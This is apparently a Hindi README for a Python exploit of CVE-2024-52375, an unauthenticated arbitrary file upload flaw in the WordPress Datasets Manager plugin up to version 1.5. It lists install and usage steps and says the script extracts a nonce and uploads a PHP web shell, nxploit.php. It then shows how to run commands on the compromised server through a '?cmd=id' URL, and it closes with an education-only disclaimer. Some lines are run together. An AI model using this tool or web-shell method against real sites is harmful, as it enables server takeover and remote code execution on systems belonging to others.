
WordPress Datasets Manager by Arttia Creative plugin <= 1.5 - मनमाना फ़ाइल अपलोड भेद्यता
💥 एक्सप्लॉइट द्वारा: Nxploit (Khaled Alenazi)
📅 CVE प्रकाशित: 14 नवंबर, 2024
🧠 CVSS स्कोर: 10.0 (गंभीर)
🛠 CWE-434: खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड
Arttia Creative के WordPress प्लगइन Datasets Manager में एक गंभीर कमजोरी पाई गई, जो 1.5 तक सभी संस्करणों को प्रभावित करती है।
प्लगइन अपलोड प्रक्रिया के दौरान फ़ाइल प्रकारों का सही ढंग से सत्यापन करने में विफल रहता है, जिससे एक अप्रमाणित हमलावर मनमानी फ़ाइलें — PHP शेल सहित — अपलोड कर सकता है और दूरस्थ कोड निष्पादन (RCE) प्राप्त कर सकता है।
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:Hrequests लाइब्रेरी:
pip install requests
usage: CVE-2024-52375.py [-h] -u URL
Exploit for WordPress Datasets Manager <= 1.5 - Arbitrary File Upload | By: Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Full target URL (e.g. http://target.com/wordpress)
URL को लक्ष्य WordPress स्थापना के पूर्ण पथ से बदलें।
यदि सफल हो, तो स्क्रिप्ट:
_wpnonce निकालें।nxploit.php नामक एक PHP शेल अपलोड करें।[+] Shell available at:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php
फिर आप इस तरह कमांड निष्पादित कर सकते हैं:
http://target.com/wordpress/wp-content/uploads/2025/03/nxploit.php?cmd=id
readme.txt के माध्यम से जांचता है।<= 1.5 संस्करण ही कमजोर हैं।यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इसे उन सिस्टमों के विरुद्ध उपयोग करना जिनके आप मालिक नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।